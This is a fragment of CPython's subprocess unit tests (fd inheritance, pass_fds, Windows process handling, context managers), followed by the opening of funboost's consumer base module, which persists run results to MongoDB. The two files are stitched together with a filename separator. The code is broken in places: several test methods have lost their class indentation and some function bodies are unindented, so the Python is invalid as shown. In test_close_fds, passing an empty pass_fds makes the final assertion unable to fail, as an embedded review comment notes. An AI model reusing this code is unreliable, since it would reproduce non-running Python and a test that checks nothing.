        script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
        env = os.environ.copy()
        env[key] = value
        # Use C locale to get ascii for the locale encoding to force
        # surrogate-escaping of \xFF in the child process; otherwise it can
        # be decoded as-is if the default locale is latin-1.
        env['LC_ALL'] = 'C'
        stdout = subprocess.check_output(
            [sys.executable, "-c", script],
            env=env)
        stdout = stdout.rstrip(b'\n\r')
        self.assertEqual(stdout.decode('ascii'), ascii(value))

        # test bytes
        key = key.encode("ascii", "surrogateescape")
        value = value.encode("ascii", "surrogateescape")
        script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
        env = os.environ.copy()
        env[key] = value
        stdout = subprocess.check_output(
            [sys.executable, "-c", script],
            env=env)
        stdout = stdout.rstrip(b'\n\r')
        self.assertEqual(stdout.decode('ascii'), ascii(value))
def test_bytes_program(self):
    # A program given as bytes (os.fsencode'd) must be accepted, with the
    # PATH given either as str or as bytes.
    abs_program = os.fsencode(sys.executable)
    path, program = os.path.split(sys.executable)
    program = os.fsencode(program)

    # absolute bytes path
    exitcode = subprocess.call([abs_program, "-c", "pass"])
    self.assertEqual(exitcode, 0)

    # absolute bytes path as a string
    cmd = b"'" + abs_program + b"' -c pass"
    exitcode = subprocess.call(cmd, shell=True)
    self.assertEqual(exitcode, 0)

    # bytes program, unicode PATH
    env = os.environ.copy()
    env["PATH"] = path
    exitcode = subprocess.call([program, "-c", "pass"], env=env)
    self.assertEqual(exitcode, 0)

    # bytes program, bytes PATH
    envb = os.environb.copy()
    envb[b"PATH"] = os.fsencode(path)
    exitcode = subprocess.call([program, "-c", "pass"], env=envb)
    self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
    # Pipe fds created for one Popen must not leak into a sibling child,
    # even with close_fds=False (the pipes are created close-on-exec).
    sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    p1 = subprocess.Popen([sys.executable, sleeper],
                          stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE, close_fds=False)

    self.addCleanup(p1.communicate, b'')

    p2 = subprocess.Popen([sys.executable, fd_status],
                          stdout=subprocess.PIPE, close_fds=False)

    output, error = p2.communicate()
    result_fds = set(map(int, output.split(b',')))
    unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
                        p1.stderr.fileno()])

    self.assertFalse(result_fds & unwanted_fds,
                     "Expected no fds from %r to be open in child, "
                     "found %r" %
                     (unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
    # End-to-end pipeline (qcat | qgrep) built from Popen objects: data
    # written into the head must come out of the tail, proving the pipe
    # fds were wired up (and closed) correctly in each child.
    qcat = support.findfile("qcat.py", subdir="subprocessdata")
    qgrep = support.findfile("qgrep.py", subdir="subprocessdata")

    subdata = b'zxcvbn'
    data = subdata * 4 + b'\n'

    p1 = subprocess.Popen([sys.executable, qcat],
                          stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                          close_fds=False)

    p2 = subprocess.Popen([sys.executable, qgrep, subdata],
                          stdin=p1.stdout, stdout=subprocess.PIPE,
                          close_fds=False)

    self.addCleanup(p1.wait)
    self.addCleanup(p2.wait)

    # Best-effort terminate in cleanup: the child may already be gone.
    def kill_p1():
        try:
            p1.terminate()
        except ProcessLookupError:
            pass

    def kill_p2():
        try:
            p2.terminate()
        except ProcessLookupError:
            pass

    self.addCleanup(kill_p1)
    self.addCleanup(kill_p2)

    p1.stdin.write(data)
    p1.stdin.close()

    # Guard against a hung pipeline: wait at most 10s for output.
    readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)

    self.assertTrue(readfiles, "The child hung")
    self.assertEqual(p2.stdout.read(), data)

    p1.stdout.close()
    p2.stdout.close()
def test_close_fds(self):
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    fds = os.pipe()
    self.addCleanup(os.close, fds[0])
    self.addCleanup(os.close, fds[1])
    open_fds = set(fds)
    # add a bunch more fds
    for _ in range(9):
        fd = os.open("/dev/null", os.O_RDONLY)
        self.addCleanup(os.close, fd)
        open_fds.add(fd)

    # close_fds=False: every inherited fd must survive in the child.
    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=False)
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertEqual(remaining_fds & open_fds, open_fds,
                     "Some fds were closed")

    # close_fds=True: none of them may survive.
    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True)
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertFalse(remaining_fds & open_fds,
                     "Some fds were left open")
    self.assertIn(1, remaining_fds, "Subprocess failed")

    # Keep some of the fd's we opened open in the subprocess.
    # This tests _posixsubprocess.c's proper handling of fds_to_keep.
    # NOTE(review): pop() removes those fds from open_fds, so the
    # triple intersection below is always empty and this assertion can
    # never fire -- confirm the intended check (likely remaining_fds &
    # fds_to_keep, with the fds listed in pass_fds).
    fds_to_keep = set(open_fds.pop() for _ in range(8))
    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True,
                         pass_fds=())
    output, ignored = p.communicate()
    remaining_fds = set(map(int, output.split(b',')))

    self.assertFalse(remaining_fds & fds_to_keep & open_fds,
                     "Some fds not in pass_fds were left open")
    self.assertIn(1, remaining_fds, "Subprocess failed")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
    # pass_fds must keep exactly the listed fd open in the child while
    # close_fds=True closes everything else.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    open_fds = set()

    for x in range(5):
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        open_fds.update(fds)

    for fd in open_fds:
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=(fd, ))
        output, ignored = p.communicate()

        remaining_fds = set(map(int, output.split(b',')))
        to_be_closed = open_fds - {fd}

        self.assertIn(fd, remaining_fds, "fd to be passed not passed")
        self.assertFalse(remaining_fds & to_be_closed,
                         "fd to be closed passed")

        # pass_fds overrides close_fds with a warning.
        with self.assertWarns(RuntimeWarning) as context:
            self.assertFalse(subprocess.call(
                    [sys.executable, "-c", "import sys; sys.exit(0)"],
                    close_fds=False, pass_fds=(fd, )))
        self.assertIn('overriding close_fds', str(context.warning))
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
    # wait() must still work when the child sets SIGCHLD to SIG_IGN.
    # NOTE: sigchild_ignore.py may not be an effective test on all OSes.
    sigchild_ignore = support.findfile("sigchild_ignore.py",
                                       subdir="subprocessdata")
    p = subprocess.Popen([sys.executable, sigchild_ignore],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
                     " non-zero with this error:\n%s" %
                     stderr.decode('utf-8'))
def test_select_unbuffered(self):
    # Issue #11459: bufsize=0 should really set the pipes as
    # unbuffered (and therefore let select() work properly).
    # import_module both loads select and skips the test where it is
    # unavailable; the local name deliberately shadows any module-level one.
    select = support.import_module("select")
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys;'
                          'sys.stdout.write("apple")'],
                         stdout=subprocess.PIPE,
                         bufsize=0)
    f = p.stdout
    self.addCleanup(f.close)
    try:
        # With an unbuffered pipe, a partial read leaves the last byte
        # immediately visible to select().
        self.assertEqual(f.read(4), b"appl")
        self.assertIn(f, select.select([f], [], [], 0.0)[0])
    finally:
        p.wait()
def test_zombie_fast_process_del(self):
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, it wouldn't be added to subprocess._active, and would
    # remain a zombie.
    # spawn a Popen, and delete its reference before it exits
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys, time;'
                          'time.sleep(0.2)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    del p
    # check that p is in the active processes list
    # (compared by id() since the object itself is no longer reachable)
    self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, and the process got killed by a signal, it would never
    # be removed from subprocess._active, which triggered a FD and memory
    # leak.
    # spawn a Popen, delete its reference and kill it
    p = subprocess.Popen([sys.executable, "-c",
                          'import time;'
                          'time.sleep(3)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    del p
    os.kill(pid, signal.SIGKILL)
    # check that p is in the active processes list
    self.assertIn(ident, [id(o) for o in subprocess._active])

    # let some time for the process to exit, and create a new Popen: this
    # should trigger the wait() of p
    time.sleep(0.2)
    with self.assertRaises(EnvironmentError) as c:
        with subprocess.Popen(['nonexisting_i_hope'],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            pass
    # p should have been wait()ed on, and removed from the _active list
    self.assertRaises(OSError, os.waitpid, pid, 0)
    self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
    # fds duplicated by preexec_fn must still be closed by close_fds=True.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    # this FD is used as dup2() target by preexec_fn, and should be closed
    # in the child process
    fd = os.dup(1)
    self.addCleanup(os.close, fd)

    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True,
                         preexec_fn=lambda: os.dup2(1, fd))
    output, ignored = p.communicate()

    remaining_fds = set(map(int, output.split(b',')))

    self.assertNotIn(fd, remaining_fds)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
    """Windows-only subprocess behaviour: startupinfo, creationflags,
    argument validation, shell invocation, and signalling children."""

    def test_startupinfo(self):
        # startupinfo argument
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_creationflags(self):
        # creationflags argument
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write("    a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # invalid arguments should raise ValueError
        # (preexec_fn and close_fds+stdout redirection are POSIX-only here)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          stdout=subprocess.PIPE,
                          close_fds=True)

    def test_close_fds(self):
        # close file descriptors
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        self.addCleanup(p.stdout.close)
        self.assertIn(b"physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        self.addCleanup(p.stdout.close)
        self.assertIn(b"physalis", p.stdout.read())

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        # Start a long-sleeping child, wait for it to be fully up, then
        # kill it via the given Popen method and check it died non-zero.
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                                 import sys, time
                                 sys.stdout.write('x\\n')
                                 sys.stdout.flush()
                                 time.sleep(30)
                                 """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        getattr(p, method)(*args)
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, b'')
        returncode = p.wait()
        self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        # As above, but the child exits on its own first: the kill method
        # must not raise on an already-dead process.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                                 import sys, time
                                 sys.stdout.write('x\\n')
                                 sys.stdout.flush()
                                 sys.exit(42)
                                 """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        self.addCleanup(p.stdin.close)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        # The process should end after this
        time.sleep(1)
        # This shouldn't raise even though the child is now dead
        getattr(p, method)(*args)
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, b'')
        rc = p.wait()
        self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
    """Tests for the commands-module replacements getoutput/getstatusoutput."""

    def test_getoutput(self):
        self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
        self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
                         (0, 'xyzzy'))

        # we use mkdtemp in the next line to create an empty directory
        # under our exclusive control; from that, we can invent a pathname
        # that we _know_ won't exist.  This is guaranteed to fail.
        tmpdir = None  # renamed from 'dir', which shadowed the builtin
        try:
            tmpdir = tempfile.mkdtemp()
            name = os.path.join(tmpdir, "foo")

            status, output = subprocess.getstatusoutput(
                ("type " if mswindows else "cat ") + name)
            self.assertNotEqual(status, 0)
        finally:
            if tmpdir is not None:
                os.rmdir(tmpdir)
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
                     "poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the whole ProcessTestCase suite with the poll() fast path
    disabled, forcing the select()-based fallback code."""

    def setUp(self):
        subprocess._has_poll = False
        ProcessTestCase.setUp(self)

    def tearDown(self):
        # Restore the real capability flag for other tests.
        subprocess._has_poll = True
        ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
    """Unit tests for module-private helpers in subprocess."""

    @unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
    def test_eintr_retry_call(self):
        record_calls = []
        def fake_os_func(*args):
            # Fake syscall: log the call, fail with EINTR on the second
            # invocation only, otherwise echo the args reversed.
            record_calls.append(args)
            if len(record_calls) == 2:
                raise OSError(errno.EINTR, "fake interrupted system call")
            return tuple(reversed(args))

        self.assertEqual((999, 256),
                         subprocess._eintr_retry_call(fake_os_func, 256, 999))
        self.assertEqual([(256, 999)], record_calls)
        # This time there will be an EINTR so it will loop once.
        self.assertEqual((666,),
                         subprocess._eintr_retry_call(fake_os_func, 666))
        self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
    """Windows-only: quoting of program paths/arguments containing spaces."""

    def setUp(self):
        super().setUp()
        # Create a helper script whose own filename contains a space; it
        # prints its argv so the tests can verify argument splitting.
        f, fname = mkstemp(".py", "te st")
        self.fname = fname.lower()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower() for a in sys.argv]))"
                 )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super().tearDown()

    def with_spaces(self, *args, **kwargs):
        # Run the helper and check it received exactly two argv entries:
        # its own (spaced) filename and the literal argument "ab cd".
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        self.addCleanup(p.stdout.close)
        self.assertEqual(
          p.stdout.read().decode("mbcs"),
          "2 [%r, 'ab cd']" % self.fname
        )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
    """Popen used as a context manager: pipes are closed and the child is
    wait()ed on when the with-block exits."""

    def test_pipe(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.stdout.write('stdout');"
                               "sys.stderr.write('stderr');"],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            self.assertEqual(proc.stdout.read(), b"stdout")
            self.assertStderrEqual(proc.stderr.read(), b"stderr")

        # __exit__ must have closed both pipe files.
        self.assertTrue(proc.stdout.closed)
        self.assertTrue(proc.stderr.closed)

    def test_returncode(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; sys.exit(100)"]) as proc:
            pass
        # __exit__ calls wait(), so the returncode should be set
        self.assertEqual(proc.returncode, 100)

    def test_communicate_stdin(self):
        with subprocess.Popen([sys.executable, "-c",
                              "import sys;"
                              "sys.exit(sys.stdin.read() == 'context')"],
                             stdin=subprocess.PIPE) as proc:
            proc.communicate(b"context")
            # sys.exit(True) maps to exit status 1.
            self.assertEqual(proc.returncode, 1)

    def test_invalid_args(self):
        # Entering the context manager with a nonexistent program must
        # propagate the FileNotFoundError.
        with self.assertRaises(FileNotFoundError) as c:
            with subprocess.Popen(['nonexisting_i_hope'],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass
def test_main():
    """Run every test case class in this module and reap leftover children."""
    unit_tests = (ProcessTestCase,
                  POSIXProcessTestCase,
                  Win32ProcessTestCase,
                  CommandTests,
                  ProcessTestCaseNoPoll,
                  HelperFunctionTests,
                  CommandsWithSpaces,
                  ContextManagerTests,
                  )

    support.run_unittest(*unit_tests)
    # Make sure no test left a zombie child behind.
    support.reap_children()
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
|
base_consumer.py | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:11
"""
所有中间件类型消费者的抽象基类。使实现不同中间件的消费者尽可能代码少。
整个流程最难的都在这里面。因为要实现多种并发模型,和对函数施加20种运行控制方式,所以代码非常长。
"""
import typing
import abc
import copy
from pathlib import Path
# from multiprocessing import Process
import datetime
# noinspection PyUnresolvedReferences,PyPackageRequirements
import pytz
import json
import logging
import sys
import atexit
import socket
import os
import uuid
import time
import traceback
# Bug fix: the ABC aliases were removed from `collections` in Python 3.10;
# `collections.abc` has been the correct home since Python 3.3.
from collections.abc import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
import asyncio
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.executors.pool import ThreadPoolExecutor as ApschedulerThreadPoolExecutor
from apscheduler.events import EVENT_JOB_MISSED
from funboost.concurrent_pool.single_thread_executor import SoloExecutor
from funboost.utils.apscheduler_monkey import patch_run_job as patch_apscheduler_run_job
import pymongo
from pymongo import IndexModel
from pymongo.errors import PyMongoError
# noinspection PyUnresolvedReferences
from nb_log import get_logger, LoggerLevelSetterMixin, LogManager, nb_print, LoggerMixin, \
LoggerMixinDefaultWithFileHandler, stdout_write, stderr_write, is_main_process, \
only_print_on_main_process, nb_log_config_default
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.async_helper import simple_run_in_executor
from funboost.concurrent_pool.async_pool_executor import AsyncPoolExecutor
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.bounded_threadpoolexcutor import \
BoundedThreadPoolExecutor
from funboost.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, \
check_evenlet_monkey_patch, CustomEventletPoolExecutor
from funboost.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, \
GeventPoolExecutor, check_gevent_monkey_patch
from funboost.concurrent_pool.custom_threadpool_executor import \
CustomThreadPoolExecutor, check_not_monkey
# from funboost.concurrent_pool.concurrent_pool_with_multi_process import ConcurrentPoolWithProcess
from funboost.consumers.redis_filter import RedisFilter, RedisImpermanencyFilter
from funboost.factories.publisher_factotry import get_publisher
from funboost.utils import decorators, time_util, RedisMixin
# noinspection PyUnresolvedReferences
from funboost.utils.bulk_operation import MongoBulkWriteHelper, InsertOne
from funboost.utils.mongo_util import MongoMixin
from funboost import funboost_config_deafult
# noinspection PyUnresolvedReferences
from funboost.constant import ConcurrentModeEnum, BrokerEnum
patch_apscheduler_run_job()
def _delete_keys_and_return_new_dict(dictx: dict, keys: list = None):
dict_new = copy.copy(dictx) # 主要是去掉一级键 publish_time,浅拷贝即可。
keys = ['publish_time', 'publish_time_format', 'extra'] if keys is None else keys
for dict_key in keys:
try:
dict_new.pop(dict_key)
except KeyError:
pass
return dict_new
class ExceptionForRetry(Exception):
    """Raise to request a retry.  Using it is optional: the framework
    automatically retries on any exception type raised by the function."""
class ExceptionForRequeue(Exception):
    """When the framework detects this exception, the message is put back
    into the queue instead of being retried in place."""
def _get_publish_time(paramsx: dict):
"""
原来存放控制参数的位置没想好,建议所有控制参数放到extra键的字典值里面。
:param paramsx:
:return:
"""
return paramsx.get('extra', {}).get('publish_time', None) or paramsx.get('publish_time', None)
class FunctionResultStatus(LoggerMixin, LoggerLevelSetterMixin):
    """Records one consumed message's run: params, result, timing, success
    flag, retry count.  ``get_status_dict()`` serialises it to a plain dict
    suitable for MongoDB persistence."""

    # Host/process/script identity is identical for every instance in this
    # process, so compute it once at class level.
    host_name = socket.gethostname()
    host_process = f'{host_name} - {os.getpid()}'
    script_name_long = sys.argv[0]
    script_name = script_name_long.split('/')[-1].split('\\')[-1]

    def __init__(self, queue_name, fucntion_name, params):
        """
        :param queue_name: queue this message came from.
        :param fucntion_name: consuming function's name.  NOTE: the parameter
            name (sic) is kept for backward compatibility with keyword callers.
        :param params: raw message params (control keys are stripped below).
        """
        self.queue_name = queue_name
        self.function = fucntion_name
        publish_time = _get_publish_time(params)
        # publish_time_str is only set when the message carries a publish
        # time, matching the original behaviour (the status dict simply has
        # no such key otherwise).
        if publish_time:
            self.publish_time_str = time_util.DatetimeConverter(publish_time).datetime_str
        function_params = _delete_keys_and_return_new_dict(params, )
        self.params = function_params
        self.params_str = json.dumps(function_params, ensure_ascii=False)
        self.result = None
        self.run_times = 0
        self.exception = None
        self.time_start = time.time()
        self.time_cost = None
        self.time_end = None
        self.success = False
        self.total_thread = threading.active_count()
        self.has_requeue = False
        self.set_log_level(20)

    def get_status_dict(self, without_datetime_obj=False):
        """Return a json-friendly snapshot dict of this run.

        :param without_datetime_obj: drop datetime-typed fields (insert_time,
            utime) so the dict is purely json-serialisable.
        """
        self.time_end = time.time()
        self.time_cost = round(self.time_end - self.time_start, 3)
        # Bug fix: take a copy instead of aliasing self.__dict__; the extra
        # keys added below ('host_name', '_id', ...) previously leaked into
        # the instance's own attribute dict.
        item = dict(self.__dict__)
        item['host_name'] = self.host_name
        item['host_process'] = self.host_process
        item['script_name'] = self.script_name
        item['script_name_long'] = self.script_name_long
        datetime_str = time_util.DatetimeConverter().datetime_str
        try:
            # Refuse to store results that are not json-serialisable; storing
            # such complex objects is considered a non-requirement, so they
            # are truncated to their repr instead.
            json.dumps(item['result'])
        except TypeError:
            item['result'] = str(item['result'])[:1000]
        item.update({'insert_time_str': datetime_str,
                     'insert_minutes': datetime_str[:-3],
                     })
        if not without_datetime_obj:
            item.update({'insert_time': datetime.datetime.now(),
                         'utime': datetime.datetime.utcnow(),
                         })
        else:
            item = _delete_keys_and_return_new_dict(item, ['insert_time', 'utime'])
        item['_id'] = str(uuid.uuid4())
        return item
class FunctionResultStatusPersistanceConfig(LoggerMixin):
    """Configuration for persisting function run status/results to MongoDB."""

    def __init__(self, is_save_status: bool, is_save_result: bool, expire_seconds: int = 7 * 24 * 3600, is_use_bulk_insert=True):
        """
        :param is_save_status: save the run status record to mongo.
        :param is_save_result: additionally save the function's return value
            (requires is_save_status).
        :param expire_seconds: TTL for the records; mongo removes expired
            execution records automatically.
        :param is_use_bulk_insert: batch the writes (flush the records of the
            last ~0.5 s in one bulk write) instead of one insert per call.
        """
        if not is_save_status and is_save_result:
            raise ValueError('你设置的是不保存函数运行状态但保存函数运行结果。不允许你这么设置')
        self.is_save_status = is_save_status
        self.is_save_result = is_save_result
        if expire_seconds > 10 * 24 * 3600:
            self.logger.warning(f'你设置的过期时间为 {expire_seconds} ,设置的时间过长。 ')
        self.expire_seconds = expire_seconds
        self.is_use_bulk_insert = is_use_bulk_insert

    def to_dict(self):
        # Bug fix: is_use_bulk_insert was previously omitted here, so the
        # serialised config disagreed with __init__'s inputs.
        return {"is_save_status": self.is_save_status,
                'is_save_result': self.is_save_result,
                'expire_seconds': self.expire_seconds,
                'is_use_bulk_insert': self.is_use_bulk_insert}
class ResultPersistenceHelper(MongoMixin, LoggerMixin):
    """Persists FunctionResultStatus records to MongoDB, either one insert
    per result or batched via bulk_write, per the persistence config."""

    def __init__(self, function_result_status_persistance_conf: FunctionResultStatusPersistanceConfig, queue_name):
        self.function_result_status_persistance_conf = function_result_status_persistance_conf
        self._bulk_list = []  # pending InsertOne operations for batched writes
        self._bulk_list_lock = Lock()
        self._last_bulk_insert_time = 0
        if self.function_result_status_persistance_conf.is_save_status:
            task_status_col = self.mongo_db_task_status.get_collection(queue_name)
            try:
                # params_str can be very long, so it must use a TEXT (or
                # HASHED) index rather than a plain one.
                task_status_col.create_indexes([IndexModel([("insert_time_str", -1)]), IndexModel([("insert_time", -1)]),
                                                IndexModel([("params_str", pymongo.TEXT)]), IndexModel([("success", 1)])
                                                ], )
                # TTL index: keep records only for the user-configured
                # lifetime (7 days by default).
                task_status_col.create_index([("utime", 1)],
                                             expireAfterSeconds=function_result_status_persistance_conf.expire_seconds)
            except pymongo.errors.OperationFailure as e:
                # Newer mongod versions raise when re-creating an index that
                # already exists on each restart, so just log and continue.
                self.logger.warning(e)
            # self._mongo_bulk_write_helper = MongoBulkWriteHelper(task_status_col, 100, 2)
            self.task_status_col = task_status_col
            self.logger.info(f"函数运行状态结果将保存至mongo的 task_status 库的 {queue_name} 集合中,请确认 funboost.py文件中配置的 MONGO_CONNECT_URL")

    def save_function_result_to_mongo(self, function_result_status: FunctionResultStatus):
        # Persist one run's status; no-op when status saving is disabled.
        if self.function_result_status_persistance_conf.is_save_status:
            item = function_result_status.get_status_dict()
            item2 = copy.copy(item)
            if not self.function_result_status_persistance_conf.is_save_result:
                item2['result'] = '不保存结果'
            if item2['result'] is None:
                item2['result'] = ''
            if item2['exception'] is None:
                item2['exception'] = ''
            if self.function_result_status_persistance_conf.is_use_bulk_insert:
                # Accumulate under the lock and flush at most twice per
                # second.  NOTE(review): the last partial batch is only
                # written when a later call arrives after the 0.5 s window --
                # confirm whether a shutdown flush is handled elsewhere.
                with self._bulk_list_lock:
                    self._bulk_list.append(InsertOne(item2))
                    if time.time() - self._last_bulk_insert_time > 0.5:
                        self.task_status_col.bulk_write(self._bulk_list, ordered=False)
                        self._bulk_list.clear()
                        self._last_bulk_insert_time = time.time()
            else:
                self.task_status_col.insert_one(item2)  # immediate real-time insert
class ConsumersManager:
    """Process-wide registry of consumers, plus helpers to join all of their
    message-scheduling threads/greenlets so processes do not exit early."""

    # Threads/greenlets that loop pulling messages; joined at shutdown.
    schedulal_thread_to_be_join = []
    # queue name -> info dict for the consumer instantiated on that queue.
    consumers_queue__info_map = dict()
    # Numeric concurrency mode shared by all consumers; the values map to
    # names in get_concurrent_name_by_concurrent_mode() below.
    global_concurrent_mode = None
    schedual_task_always_use_thread = False
    _has_show_conusmers_info = False

    @classmethod
    def join_all_consumer_shedual_task_thread(cls):
